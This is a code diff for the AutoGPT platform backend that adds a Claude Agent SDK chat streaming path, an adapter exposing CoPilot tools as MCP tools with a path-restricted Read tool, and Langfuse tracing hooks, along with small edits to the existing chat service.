+    context: dict[str, str] | None = None,  # noqa: ARG001
+) -> AsyncGenerator[StreamBaseResponse, None]:
+    """Stream chat completion using Claude Agent SDK.
+
+    Drop-in replacement for stream_chat_completion with improved reliability.
+    """
+
+    if session is None:
+        session = await get_chat_session(session_id, user_id)
+
+    if not session:
+        raise NotFoundError(
+            f"Session {session_id} not found. Please create a new session first."
+        )
+
+    if message:
+        session.messages.append(
+            ChatMessage(
+                role="user" if is_user_message else "assistant", content=message
+            )
+        )
+        if is_user_message:
+            track_user_message(
+                user_id=user_id, session_id=session_id, message_length=len(message)
+            )
+
+    session = await upsert_chat_session(session)
+
+    # Generate title for new sessions (first user message)
+    if is_user_message and not session.title:
+        user_messages = [m for m in session.messages if m.role == "user"]
+        if len(user_messages) == 1:
+            first_message = user_messages[0].content or message or ""
+            if first_message:
+                task = asyncio.create_task(
+                    _update_title_async(session_id, first_message, user_id)
+                )
+                _background_tasks.add(task)
+                task.add_done_callback(_background_tasks.discard)
+
+    # Build system prompt (reuses non-SDK path with Langfuse support)
+    has_history = len(session.messages) > 1
+    system_prompt, _ = await _build_system_prompt(
+        user_id, has_conversation_history=has_history
+    )
+    system_prompt += _SDK_TOOL_SUPPLEMENT
+    message_id = str(uuid.uuid4())
+    text_block_id = str(uuid.uuid4())
+    task_id = str(uuid.uuid4())
+
+    yield StreamStart(messageId=message_id, taskId=task_id)
+
+    stream_completed = False
+    # Use a session-specific temp dir to avoid cleanup race conditions
+    # between concurrent sessions.
+    sdk_cwd = _make_sdk_cwd(session_id)
+    os.makedirs(sdk_cwd, exist_ok=True)
+
+    set_execution_context(user_id, session, None)
+
+    try:
+        try:
+            from claude_agent_sdk import ClaudeAgentOptions, ClaudeSDKClient
+
+            mcp_server = create_copilot_mcp_server()
+
+            sdk_model = _resolve_sdk_model()
+
+            # Initialize Langfuse tracing (no-op if not configured)
+            tracer = TracedSession(session_id, user_id, system_prompt, model=sdk_model)
+
+            # Merge security hooks with optional tracing hooks
+            security_hooks = create_security_hooks(user_id, sdk_cwd=sdk_cwd)
+            tracing_hooks = create_tracing_hooks(tracer)
+            combined_hooks = merge_hooks(security_hooks, tracing_hooks)
+
+            options = ClaudeAgentOptions(
+                system_prompt=system_prompt,
+                mcp_servers={"copilot": mcp_server},  # type: ignore[arg-type]
+                allowed_tools=COPILOT_TOOL_NAMES,
+                hooks=combined_hooks,  # type: ignore[arg-type]
+                cwd=sdk_cwd,
+                max_buffer_size=config.claude_agent_max_buffer_size,
+                model=sdk_model,
+                env=_build_sdk_env(),
+                user=user_id or None,
+                max_budget_usd=config.claude_agent_max_budget_usd,
+            )
+
+            adapter = SDKResponseAdapter(message_id=message_id)
+            adapter.set_task_id(task_id)
+
+            async with tracer, ClaudeSDKClient(options=options) as client:
+                current_message = message or ""
+                if not current_message and session.messages:
+                    last_user = [m for m in session.messages if m.role == "user"]
+                    if last_user:
+                        current_message = last_user[-1].content or ""
+
+                if not current_message.strip():
+                    yield StreamError(
+                        errorText="Message cannot be empty.",
+                        code="empty_prompt",
+                    )
+                    yield StreamFinish()
+                    return
+
+                # Build query with conversation history context.
+                # Compress history first to handle long conversations.
+                query_message = current_message
+                if len(session.messages) > 1:
+                    compressed = await _compress_conversation_history(session)
+                    history_context = _format_conversation_context(compressed)
+                    if history_context:
+                        query_message = (
+                            f"{history_context}\n\n"
+                            f"Now, the user says:\n{current_message}"
+                        )
+
+                logger.info(
+                    f"[SDK] Sending query: {current_message[:80]!r}"
+                    f" ({len(session.messages)} msgs in session)"
+                )
+                tracer.log_user_message(current_message)
+                await client.query(query_message, session_id=session_id)
+
+                assistant_response = ChatMessage(role="assistant", content="")
+                accumulated_tool_calls: list[dict[str, Any]] = []
+                has_appended_assistant = False
+                has_tool_results = False
+
+                async for sdk_msg in client.receive_messages():
+                    logger.debug(
+                        f"[SDK] Received: {type(sdk_msg).__name__} "
+                        f"{getattr(sdk_msg, 'subtype', '')}"
+                    )
+                    tracer.log_sdk_message(sdk_msg)
+                    for response in adapter.convert_message(sdk_msg):
+                        if isinstance(response, StreamStart):
+                            continue
+                        yield response
+
+                        if isinstance(response, StreamTextDelta):
+                            delta = response.delta or ""
+                            # After tool results, start a new assistant
+                            # message for the post-tool text.
+                            if has_tool_results and has_appended_assistant:
+                                assistant_response = ChatMessage(
+                                    role="assistant", content=delta
+                                )
+                                accumulated_tool_calls = []
+                                has_appended_assistant = False
+                                has_tool_results = False
+                                session.messages.append(assistant_response)
+                                has_appended_assistant = True
+                            else:
+                                assistant_response.content = (
+                                    assistant_response.content or ""
+                                ) + delta
+                                if not has_appended_assistant:
+                                    session.messages.append(assistant_response)
+                                    has_appended_assistant = True
+
+                        elif isinstance(response, StreamToolInputAvailable):
+                            accumulated_tool_calls.append(
+                                {
+                                    "id": response.toolCallId,
+                                    "type": "function",
+                                    "function": {
+                                        "name": response.toolName,
+                                        "arguments": json.dumps(response.input or {}),
+                                    },
+                                }
+                            )
+                            assistant_response.tool_calls = accumulated_tool_calls
+                            if not has_appended_assistant:
+                                session.messages.append(assistant_response)
+                                has_appended_assistant = True
+
+                        elif isinstance(response, StreamToolOutputAvailable):
+                            session.messages.append(
+                                ChatMessage(
+                                    role="tool",
+                                    content=(
+                                        response.output
+                                        if isinstance(response.output, str)
+                                        else str(response.output)
+                                    ),
+                                    tool_call_id=response.toolCallId,
+                                )
+                            )
+                            has_tool_results = True
+
+                        elif isinstance(response, StreamUsage):
+                            session.usage.append(
+                                Usage(
+                                    prompt_tokens=response.promptTokens,
+                                    completion_tokens=response.completionTokens,
+                                    total_tokens=response.totalTokens,
+                                )
+                            )
+
+                        elif isinstance(response, StreamFinish):
+                            stream_completed = True
+
+                    if stream_completed:
+                        break
+
+                if (
+                    assistant_response.content or assistant_response.tool_calls
+                ) and not has_appended_assistant:
+                    session.messages.append(assistant_response)
+
+        except ImportError:
+            logger.warning(
+                "[SDK] claude-agent-sdk not available, using Anthropic fallback"
+            )
+            async for response in stream_with_anthropic(
+                session, system_prompt, text_block_id
+            ):
+                if isinstance(response, StreamFinish):
+                    stream_completed = True
+                yield response
+
+        await upsert_chat_session(session)
+        logger.debug(
+            f"[SDK] Session {session_id} saved with {len(session.messages)} messages"
+        )
+        if not stream_completed:
+            yield StreamFinish()
+
+    except Exception as e:
+        logger.error(f"[SDK] Error: {e}", exc_info=True)
+        try:
+            await upsert_chat_session(session)
+        except Exception as save_err:
+            logger.error(f"[SDK] Failed to save session on error: {save_err}")
+        yield StreamError(
+            errorText="An error occurred. Please try again.",
+            code="sdk_error",
+        )
+        yield StreamFinish()
+    finally:
+        _cleanup_sdk_tool_results(sdk_cwd)
+
+
+async def _update_title_async(
+    session_id: str, message: str, user_id: str | None = None
+) -> None:
+    """Background task to update session title."""
+    try:
+        title = await _generate_session_title(
+            message, user_id=user_id, session_id=session_id
+        )
+        if title:
+            await update_session_title(session_id, title)
+            logger.debug(f"[SDK] Generated title for {session_id}: {title}")
+    except Exception as e:
+        logger.warning(f"[SDK] Failed to update session title: {e}")
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/tool_adapter.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/tool_adapter.py
@@ -0,0 +1,321 @@
+"""Tool adapter for wrapping existing CoPilot tools as Claude Agent SDK MCP tools.
+
+This module provides the adapter layer that converts existing BaseTool implementations
+into in-process MCP tools that can be used with the Claude Agent SDK.
+"""
+
+import json
+import logging
+import os
+import uuid
+from contextvars import ContextVar
+from typing import Any
+
+from backend.api.features.chat.model import ChatSession
+from backend.api.features.chat.tools import TOOL_REGISTRY
+from backend.api.features.chat.tools.base import BaseTool
+
+logger = logging.getLogger(__name__)
+
+# Allowed base directory for the Read tool (SDK saves oversized tool results here)
+_SDK_TOOL_RESULTS_DIR = os.path.expanduser("~/.claude/")
+
+# MCP server naming - the SDK prefixes tool names as "mcp__{server_name}__{tool}"
+MCP_SERVER_NAME = "copilot"
+MCP_TOOL_PREFIX = f"mcp__{MCP_SERVER_NAME}__"
+
+# Context variables to pass user/session info to tool execution
+_current_user_id: ContextVar[str | None] = ContextVar("current_user_id", default=None)
+_current_session: ContextVar[ChatSession | None] = ContextVar(
+    "current_session", default=None
+)
+_current_tool_call_id: ContextVar[str | None] = ContextVar(
+    "current_tool_call_id", default=None
+)
+
+# Stash for MCP tool outputs before the SDK potentially truncates them.
+# Keyed by tool_name → full output string. Consumed (popped) by the
+# response adapter when it builds StreamToolOutputAvailable.
+_pending_tool_outputs: ContextVar[dict[str, str]] = ContextVar(
+    "pending_tool_outputs", default=None  # type: ignore[arg-type]
+)
+
+
+def set_execution_context(
+    user_id: str | None,
+    session: ChatSession,
+    tool_call_id: str | None = None,
+) -> None:
+    """Set the execution context for tool calls.
+
+    This must be called before streaming begins to ensure tools have access
+    to user_id and session information.
+    """
+    _current_user_id.set(user_id)
+    _current_session.set(session)
+    _current_tool_call_id.set(tool_call_id)
+    _pending_tool_outputs.set({})
+
+
+def get_execution_context() -> tuple[str | None, ChatSession | None, str | None]:
+    """Get the current execution context."""
+    return (
+        _current_user_id.get(),
+        _current_session.get(),
+        _current_tool_call_id.get(),
+    )
+
+
+def pop_pending_tool_output(tool_name: str) -> str | None:
+    """Pop and return the stashed full output for *tool_name*.
+
+    The SDK CLI may truncate large tool results (writing them to disk and
+    replacing the content with a file reference). This stash keeps the
+    original MCP output so the response adapter can forward it to the
+    frontend for proper widget rendering.
+
+    Returns ``None`` if nothing was stashed for *tool_name*.
+    """
+    pending = _pending_tool_outputs.get(None)
+    if pending is None:
+        return None
+    return pending.pop(tool_name, None)
+
+
+def create_tool_handler(base_tool: BaseTool):
+    """Create an async handler function for a BaseTool.
+
+    This wraps the existing BaseTool._execute method to be compatible
+    with the Claude Agent SDK MCP tool format.
+    """
+
+    async def tool_handler(args: dict[str, Any]) -> dict[str, Any]:
+        """Execute the wrapped tool and return MCP-formatted response."""
+        user_id, session, tool_call_id = get_execution_context()
+
+        if session is None:
+            return {
+                "content": [
+                    {
+                        "type": "text",
+                        "text": json.dumps(
+                            {
+                                "error": "No session context available",
+                                "type": "error",
+                            }
+                        ),
+                    }
+                ],
+                "isError": True,
+            }
+
+        try:
+            # Call the existing tool's execute method
+            # Generate unique tool_call_id per invocation for proper correlation
+            effective_id = tool_call_id or f"sdk-{uuid.uuid4().hex[:12]}"
+            result = await base_tool.execute(
+                user_id=user_id,
+                session=session,
+                tool_call_id=effective_id,
+                **args,
+            )
+
+            # The result is a StreamToolOutputAvailable, extract the output
+            text = (
+                result.output
+                if isinstance(result.output, str)
+                else json.dumps(result.output)
+            )
+
+            # Stash the full output before the SDK potentially truncates it.
+            # The response adapter will pop this for frontend widget rendering.
+            pending = _pending_tool_outputs.get(None)
+            if pending is not None:
+                pending[base_tool.name] = text
+
+            return {
+                "content": [{"type": "text", "text": text}],
+                "isError": not result.success,
+            }
+
+        except Exception as e:
+            logger.error(f"Error executing tool {base_tool.name}: {e}", exc_info=True)
+            return {
+                "content": [
+                    {
+                        "type": "text",
+                        "text": json.dumps(
+                            {
+                                "error": str(e),
+                                "type": "error",
+                                "message": f"Failed to execute {base_tool.name}",
+                            }
+                        ),
+                    }
+                ],
+                "isError": True,
+            }
+
+    return tool_handler
+
+
+def _build_input_schema(base_tool: BaseTool) -> dict[str, Any]:
+    """Build a JSON Schema input schema for a tool."""
+    return {
+        "type": "object",
+        "properties": base_tool.parameters.get("properties", {}),
+        "required": base_tool.parameters.get("required", []),
+    }
+
+
+def get_tool_definitions() -> list[dict[str, Any]]:
+    """Get all tool definitions in MCP format.
+
+    Returns a list of tool definitions that can be used with
+    create_sdk_mcp_server or as raw tool definitions.
+    """
+    tool_definitions = []
+
+    for tool_name, base_tool in TOOL_REGISTRY.items():
+        tool_def = {
+            "name": tool_name,
+            "description": base_tool.description,
+            "inputSchema": _build_input_schema(base_tool),
+        }
+        tool_definitions.append(tool_def)
+
+    return tool_definitions
+
+
+def get_tool_handlers() -> dict[str, Any]:
+    """Get all tool handlers mapped by name.
+
+    Returns a dictionary mapping tool names to their handler functions.
+    """
+    handlers = {}
+
+    for tool_name, base_tool in TOOL_REGISTRY.items():
+        handlers[tool_name] = create_tool_handler(base_tool)
+
+    return handlers
+
+
+async def _read_file_handler(args: dict[str, Any]) -> dict[str, Any]:
+    """Read a file with optional offset/limit. Restricted to SDK working directory.
+
+    After reading, the file is deleted to prevent accumulation in long-running pods.
+    """
+    file_path = args.get("file_path", "")
+    offset = args.get("offset", 0)
+    limit = args.get("limit", 2000)
+
+    # Security: only allow reads under the SDK's working directory
+    real_path = os.path.realpath(file_path)
+    if not real_path.startswith(_SDK_TOOL_RESULTS_DIR):
+        return {
+            "content": [{"type": "text", "text": f"Access denied: {file_path}"}],
+            "isError": True,
+        }
+
+    try:
+        with open(real_path) as f:
+            lines = f.readlines()
+        selected = lines[offset : offset + limit]
+        content = "".join(selected)
+        return {"content": [{"type": "text", "text": content}], "isError": False}
+    except FileNotFoundError:
+        return {
+            "content": [{"type": "text", "text": f"File not found: {file_path}"}],
+            "isError": True,
+        }
+    except Exception as e:
+        return {
+            "content": [{"type": "text", "text": f"Error reading file: {e}"}],
+            "isError": True,
+        }
+
+
+_READ_TOOL_NAME = "Read"
+_READ_TOOL_DESCRIPTION = (
+    "Read a file from the local filesystem. "
+    "Use offset and limit to read specific line ranges for large files."
+)
+_READ_TOOL_SCHEMA = {
+    "type": "object",
+    "properties": {
+        "file_path": {
+            "type": "string",
+            "description": "The absolute path to the file to read",
+        },
+        "offset": {
+            "type": "integer",
+            "description": "Line number to start reading from (0-indexed). Default: 0",
+        },
+        "limit": {
+            "type": "integer",
+            "description": "Number of lines to read. Default: 2000",
+        },
+    },
+    "required": ["file_path"],
+}
+
+
+# Create the MCP server configuration
+def create_copilot_mcp_server():
+    """Create an in-process MCP server configuration for CoPilot tools.
+
+    This can be passed to ClaudeAgentOptions.mcp_servers.
+
+    Note: The actual SDK MCP server creation depends on the claude-agent-sdk
+    package being available. This function returns the configuration that
+    can be used with the SDK.
+    """
+    try:
+        from claude_agent_sdk import create_sdk_mcp_server, tool
+
+        # Create decorated tool functions
+        sdk_tools = []
+
+        for tool_name, base_tool in TOOL_REGISTRY.items():
+            handler = create_tool_handler(base_tool)
+            decorated = tool(
+                tool_name,
+                base_tool.description,
+                _build_input_schema(base_tool),
+            )(handler)
+            sdk_tools.append(decorated)
+
+        # Add the Read tool so the SDK can read back oversized tool results
+        read_tool = tool(
+            _READ_TOOL_NAME,
+            _READ_TOOL_DESCRIPTION,
+            _READ_TOOL_SCHEMA,
+        )(_read_file_handler)
+        sdk_tools.append(read_tool)
+
+        server = create_sdk_mcp_server(
+            name=MCP_SERVER_NAME,
+            version="1.0.0",
+            tools=sdk_tools,
+        )
+
+        return server
+
+    except ImportError:
+        # Let ImportError propagate so service.py handles the fallback
+        raise
+
+
+# SDK built-in tools allowed within the workspace directory.
+# Security hooks validate that file paths stay within sdk_cwd
+# and that Bash commands are restricted to a safe allowlist.
+_SDK_BUILTIN_TOOLS = ["Read", "Write", "Edit", "Glob", "Grep", "Bash"]
+
+# List of tool names for allowed_tools configuration
+# Include MCP tools, the MCP Read tool for oversized results,
+# and SDK built-in file tools for workspace operations.
+COPILOT_TOOL_NAMES = [
+    *[f"{MCP_TOOL_PREFIX}{name}" for name in TOOL_REGISTRY.keys()],
+    f"{MCP_TOOL_PREFIX}{_READ_TOOL_NAME}",
+    *_SDK_BUILTIN_TOOLS,
+]
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/tracing.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/tracing.py
@@ -0,0 +1,429 @@
+"""Langfuse tracing integration for Claude Agent SDK.
+
+This module provides modular, non-invasive observability for SDK sessions.
+All tracing is opt-in (only active when Langfuse credentials are configured)
+and designed to not affect the core execution flow.
+
+Usage:
+    async with TracedSession(session_id, user_id) as tracer:
+        # Your SDK code here
+        tracer.log_user_message(message)
+        async for sdk_msg in client.receive_messages():
+            tracer.log_sdk_message(sdk_msg)
+        tracer.log_result(result_message)
+"""
+
+from __future__ import annotations
+
+import logging
+import time
+from contextlib import asynccontextmanager
+from dataclasses import dataclass, field
+from typing import TYPE_CHECKING, Any
+
+from backend.util.settings import Settings
+
+if TYPE_CHECKING:
+    from claude_agent_sdk import Message, ResultMessage
+
+logger = logging.getLogger(__name__)
+settings = Settings()
+
+
+def _is_langfuse_configured() -> bool:
+    """Check if Langfuse credentials are configured."""
+    return bool(
+        settings.secrets.langfuse_public_key and settings.secrets.langfuse_secret_key
+    )
+
+
+@dataclass
+class ToolSpan:
+    """Tracks a single tool call for tracing."""
+
+    tool_call_id: str
+    tool_name: str
+    input: dict[str, Any]
+    start_time: float = field(default_factory=time.perf_counter)
+    output: str | None = None
+    success: bool = True
+    end_time: float | None = None
+
+
+@dataclass
+class GenerationSpan:
+    """Tracks an LLM generation (text output) for tracing."""
+
+    text: str = ""
+    start_time: float = field(default_factory=time.perf_counter)
+    end_time: float | None = None
+    tool_calls: list[ToolSpan] = field(default_factory=list)
+
+
+class TracedSession:
+    """Context manager for tracing a Claude Agent SDK session with Langfuse.
+
+    Automatically creates a trace with:
+    - Session-level metadata (user_id, session_id)
+    - Generation spans for LLM outputs
+    - Tool call spans with input/output
+    - Token usage and cost (from ResultMessage)
+
+    If Langfuse is not configured, all methods are no-ops.
+    """
+
+    def __init__(
+        self,
+        session_id: str,
+        user_id: str | None = None,
+        system_prompt: str | None = None,
+        model: str | None = None,
+    ):
+        self.session_id = session_id
+        self.user_id = user_id
+        self.system_prompt = system_prompt
+        self.model = model
+        self.enabled = _is_langfuse_configured()
+
+        # Internal state
+        self._trace: Any = None
+        self._langfuse: Any = None
+        self._user_message: str | None = None
+        self._generations: list[GenerationSpan] = []
+        self._current_generation: GenerationSpan | None = None
+        self._pending_tools: dict[str, ToolSpan] = {}
+        self._start_time: float = 0
+
+    async def __aenter__(self) -> TracedSession:
+        """Start the trace."""
+        if not self.enabled:
+            return self
+
+        try:
+            from langfuse import get_client
+
+            self._langfuse = get_client()
+            self._start_time = time.perf_counter()
+
+            # Create the root trace
+            self._trace = self._langfuse.trace(
+                name="copilot-sdk-session",
+                session_id=self.session_id,
+                user_id=self.user_id,
+                metadata={
+                    "sdk": "claude-agent-sdk",
+                    "has_system_prompt": bool(self.system_prompt),
+                },
+            )
+            logger.debug(f"[Tracing] Started trace for session {self.session_id}")
+
+        except Exception as e:
+            logger.warning(f"[Tracing] Failed to start trace: {e}")
+            self.enabled = False
+
+        return self
+
+    async def __aexit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None:
+        """End the trace and flush to Langfuse."""
+        if not self.enabled or not self._trace:
+            return
+
+        try:
+            # Finalize any open generation
+            self._finalize_current_generation()
+
+            # Add generations as spans
+            for gen in self._generations:
+                self._trace.span(
+                    name="llm-generation",
+                    start_time=gen.start_time,
+                    end_time=gen.end_time or time.perf_counter(),
+                    output=gen.text[:1000] if gen.text else None,  # Truncate
+                    metadata={"tool_calls": len(gen.tool_calls)},
+                )
+
+                # Add tool calls as nested spans
+                for tool in gen.tool_calls:
+                    self._trace.span(
+                        name=f"tool:{tool.tool_name}",
+                        start_time=tool.start_time,
+                        end_time=tool.end_time or time.perf_counter(),
+                        input=tool.input,
+                        output=tool.output[:500] if tool.output else None,
+                        metadata={
+                            "tool_call_id": tool.tool_call_id,
+                            "success": tool.success,
+                        },
+                    )
+
+            # Update trace with final status
+            status = "error" if exc_type else "success"
+            self._trace.update(
+                output=self._generations[-1].text[:500] if self._generations else None,
+                metadata={"status": status, "num_generations": len(self._generations)},
+            )
+
+            # Flush asynchronously (Langfuse handles this in background)
+            logger.debug(
+                f"[Tracing] Completed trace for session {self.session_id}, "
+                f"{len(self._generations)} generations"
+            )
+
+        except Exception as e:
+            logger.warning(f"[Tracing] Failed to finalize trace: {e}")
+
+    def log_user_message(self, message: str) -> None:
+        """Log the user's input message."""
+        if not self.enabled or not self._trace:
+            return
+
+        self._user_message = message
+        try:
+            self._trace.update(input=message[:1000])
+        except Exception as e:
+            logger.debug(f"[Tracing] Failed to log user message: {e}")
+
+    def log_sdk_message(self, sdk_message: Message) -> None:
+        """Log an SDK message (automatically categorizes by type)."""
+        if not self.enabled:
+            return
+
+        try:
+            from claude_agent_sdk import (
+                AssistantMessage,
+                ResultMessage,
+                TextBlock,
+                ToolResultBlock,
+                ToolUseBlock,
+                UserMessage,
+            )
+
+            if isinstance(sdk_message, AssistantMessage):
+                # Start a new generation if needed
+                if self._current_generation is None:
+                    self._current_generation = GenerationSpan()
+                    self._generations.append(self._current_generation)
+
+                for block in sdk_message.content:
+                    if isinstance(block, TextBlock) and block.text:
+                        self._current_generation.text += block.text
+
+                    elif isinstance(block, ToolUseBlock):
+                        tool_span = ToolSpan(
+                            tool_call_id=block.id,
+                            tool_name=block.name,
+                            input=block.input or {},
+                        )
+                        self._pending_tools[block.id] = tool_span
+                        if self._current_generation:
+                            self._current_generation.tool_calls.append(tool_span)
+
+            elif isinstance(sdk_message, UserMessage):
+                # UserMessage carries tool results
+                content = sdk_message.content
+                blocks = content if isinstance(content, list) else []
+                for block in blocks:
+                    if isinstance(block, ToolResultBlock) and block.tool_use_id:
+                        tool_span = self._pending_tools.get(block.tool_use_id)
+                        if tool_span:
+                            tool_span.end_time = time.perf_counter()
+                            tool_span.success = not (block.is_error or False)
+                            tool_span.output = self._extract_tool_output(block.content)
+
+                # After tool results, finalize current generation
+                # (SDK will start a new AssistantMessage for continuation)
+                self._finalize_current_generation()
+
+            elif isinstance(sdk_message, ResultMessage):
+                self._log_result(sdk_message)
+
+        except Exception as e:
+            logger.debug(f"[Tracing] Failed to log SDK message: {e}")
+
+    def _log_result(self, result: ResultMessage) -> None:
+        """Log the final result with usage and cost."""
+        if not self.enabled or not self._trace:
+            return
+
+        try:
+            # Extract usage info
+            usage = result.usage or {}
+            metadata: dict[str, Any] = {
+                "duration_ms": result.duration_ms,
+                "duration_api_ms": result.duration_api_ms,
+                "num_turns": result.num_turns,
+                "is_error": result.is_error,
+            }
+
+            if result.total_cost_usd is not None:
+                metadata["cost_usd"] = result.total_cost_usd
+
+            if usage:
+                metadata["usage"] = usage
+
+            self._trace.update(metadata=metadata)
+
+            # Log as a generation for proper Langfuse cost/usage tracking
+            if usage or result.total_cost_usd:
+                self._trace.generation(
+                    name="claude-sdk-completion",
+                    model=self.model or "claude-sonnet-4-20250514",
+                    usage=(
+                        {
+                            "input": usage.get("input_tokens", 0),
+                            "output": usage.get("output_tokens", 0),
+                            "total": usage.get("input_tokens", 0)
+                            + usage.get("output_tokens", 0),
+                        }
+                        if usage
+                        else None
+                    ),
+                    metadata={"cost_usd": result.total_cost_usd},
+                )
+
+            logger.debug(
+                f"[Tracing] Logged result: {result.num_turns} turns, "
+                f"${result.total_cost_usd:.4f} cost"
+                if result.total_cost_usd
+                else f"[Tracing] Logged result: {result.num_turns} turns"
+            )
+
+        except Exception as e:
+            logger.debug(f"[Tracing] Failed to log result: {e}")
+
+    def _finalize_current_generation(self) -> None:
+        """Mark the current generation as complete."""
+        if self._current_generation:
+            self._current_generation.end_time = time.perf_counter()
+            self._current_generation = None
+
+    @staticmethod
+    def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
+        """Extract string output from tool result content."""
+        if isinstance(content, str):
+            return content
+        if isinstance(content, list):
+            parts = [
+                item.get("text", "") for item in content if item.get("type") == "text"
+            ]
+            return "".join(parts) if parts else str(content)
+        return str(content) if content else ""
+
+
+@asynccontextmanager
+async def traced_session(
+    session_id: str,
+    user_id: str | None = None,
+    system_prompt: str | None = None,
+    model: str | None = None,
+):
+    """Convenience async context manager for tracing SDK sessions.
+
+    Usage:
+        async with traced_session(session_id, user_id) as tracer:
+            tracer.log_user_message(message)
+            async for msg in client.receive_messages():
+                tracer.log_sdk_message(msg)
+    """
+    tracer = TracedSession(session_id, user_id, system_prompt, model=model)
+    async with tracer:
+        yield tracer
+
+
+def create_tracing_hooks(tracer: TracedSession) -> dict[str, Any]:
+    """Create SDK hooks for fine-grained Langfuse tracing.
+
+    These hooks capture precise timing for tool executions and failures
+    that may not be visible in the message stream.
+
+    Designed to be merged with security hooks:
+        hooks = {**security_hooks, **create_tracing_hooks(tracer)}
+
+    Args:
+        tracer: The active TracedSession instance
+
+    Returns:
+        Hooks configuration dict for ClaudeAgentOptions
+    """
+    if not tracer.enabled:
+        return {}
+
+    try:
+        from claude_agent_sdk import HookMatcher
+        from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput
+
+        async def trace_pre_tool_use(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Record tool start time for accurate duration tracking."""
+            _ = context
+            if not tool_use_id:
+                return {}
+            tool_name = str(input_data.get("tool_name", "unknown"))
+            tool_input = input_data.get("tool_input", {})
+
+            # Record start time in pending tools
+            tracer._pending_tools[tool_use_id] = ToolSpan(
+                tool_call_id=tool_use_id,
+                tool_name=tool_name,
+                input=tool_input if isinstance(tool_input, dict) else {},
+            )
+            return {}
+
+        async def trace_post_tool_use(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Record tool completion for duration calculation."""
+            _ = context
+            if tool_use_id and tool_use_id in tracer._pending_tools:
+                tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
+                tracer._pending_tools[tool_use_id].success = True
+            return {}
+
+        async def trace_post_tool_failure(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Record tool failures for error tracking."""
+            _ = context
+            if tool_use_id and tool_use_id in tracer._pending_tools:
+                tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
+                tracer._pending_tools[tool_use_id].success = False
+                error = input_data.get("error", "Unknown error")
+                tracer._pending_tools[tool_use_id].output = f"ERROR: {error}"
+            return {}
+
+        return {
+            "PreToolUse": [HookMatcher(matcher="*", hooks=[trace_pre_tool_use])],
+            "PostToolUse": [HookMatcher(matcher="*", hooks=[trace_post_tool_use])],
+            "PostToolUseFailure": [
+                HookMatcher(matcher="*", hooks=[trace_post_tool_failure])
+            ],
+        }
+
+    except ImportError:
+        logger.debug("[Tracing] SDK not available for hook-based tracing")
+        return {}
+
+
+def merge_hooks(*hook_dicts: dict[str, Any]) -> dict[str, Any]:
+    """Merge multiple hook configurations into one.
+
+    Combines hook matchers for the same event type, allowing both
+    security and tracing hooks to coexist.
+
+    Usage:
+        combined = merge_hooks(security_hooks, tracing_hooks)
+    """
+    result: dict[str, list[Any]] = {}
+    for hook_dict in hook_dicts:
+        for event_name, matchers in hook_dict.items():
+            if event_name not in result:
+                result[event_name] = []
+            result[event_name].extend(matchers)
+    return result
--- a/autogpt_platform/backend/backend/api/features/chat/service.py
+++ b/autogpt_platform/backend/backend/api/features/chat/service.py
@@ -27,7 +27,6 @@ from openai.types.chat import (
    ChatCompletionToolParam,
 )

-from backend.data.db_accessors import chat_db
 from backend.data.redis_client import get_redis_async
 from backend.data.understanding import (
    format_understanding_for_prompt,
@@ -36,6 +35,7 @@ from backend.data.understanding import (
 from backend.util.exceptions import NotFoundError
 from backend.util.settings import AppEnvironment, Settings

+from . import db as chat_db
 from . import stream_registry
 from .config import ChatConfig
 from .model import (
@@ -245,12 +245,16 @@ async def _get_system_prompt_template(context: str) -> str:
    return DEFAULT_SYSTEM_PROMPT.format(users_information=context)


-async def _build_system_prompt(user_id: str | None) -> tuple[str, Any]:
+async def _build_system_prompt(
+    user_id: str | None, has_conversation_history: bool = False
+) -> tuple[str, Any]:
    """Build the full system prompt including business understanding if available.

    Args:
-        user_id: The user ID for fetching business understanding
-                     If "default" and this is the user's first session, will use "onboarding" instead.
+        user_id: The user ID for fetching business understanding.
+        has_conversation_history: Whether there's existing conversation history.
+            If True, we don't tell the model to greet/introduce (since they're
+            already in a conversation).

    Returns:
        Tuple of (compiled prompt string, business understanding object)
@@ -266,6 +270,8 @@ async def _build_system_prompt(user_id: str | None) -> tuple[str, Any]:

    if understanding:
        context = format_understanding_for_prompt(understanding)
+    elif has_conversation_history:
+        context = "No prior understanding saved yet. Continue the existing conversation naturally."
    else:
        context = "This is the first time you are meeting the user. Greet them and introduce them to the platform"

@@ -374,7 +380,6 @@ async def stream_chat_completion(

    Raises:
        NotFoundError: If session_id is invalid
-        ValueError: If max_context_messages is exceeded

    """
    completion_start = time.monotonic()
@@ -459,8 +464,9 @@ async def stream_chat_completion(

    # Generate title for new sessions on first user message (non-blocking)
    # Check: is_user_message, no title yet, and this is the first user message
-    if is_user_message and message and not session.title:
-        user_messages = [m for m in session.messages if m.role == "user"]
+    user_messages = [m for m in session.messages if m.role == "user"]
+    first_user_msg = message or (user_messages[0].content if user_messages else None)
+    if is_user_message and first_user_msg and not session.title:
        if len(user_messages) == 1:
            # First user message - generate title in background
            import asyncio
@@ -468,7 +474,7 @@ async def stream_chat_completion(
            # Capture only the values we need (not the session object) to avoid
            # stale data issues when the main flow modifies the session
            captured_session_id = session_id
-            captured_message = message
+            captured_message = first_user_msg
            captured_user_id = user_id

            async def _update_title():
@@ -800,13 +806,9 @@ async def stream_chat_completion(
        # Build the messages list in the correct order
        messages_to_save: list[ChatMessage] = []

-        # Add assistant message with tool_calls if any.
-        # Use extend (not assign) to preserve tool_calls already added by
-        # _yield_tool_call for long-running tools.
+        # Add assistant message with tool_calls if any
        if accumulated_tool_calls:
-            if not assistant_response.tool_calls:
-                assistant_response.tool_calls = []
-            assistant_response.tool_calls.extend(accumulated_tool_calls)
+            assistant_response.tool_calls = accumulated_tool_calls
            logger.info(
                f"Added {len(accumulated_tool_calls)} tool calls to assistant message"
            )
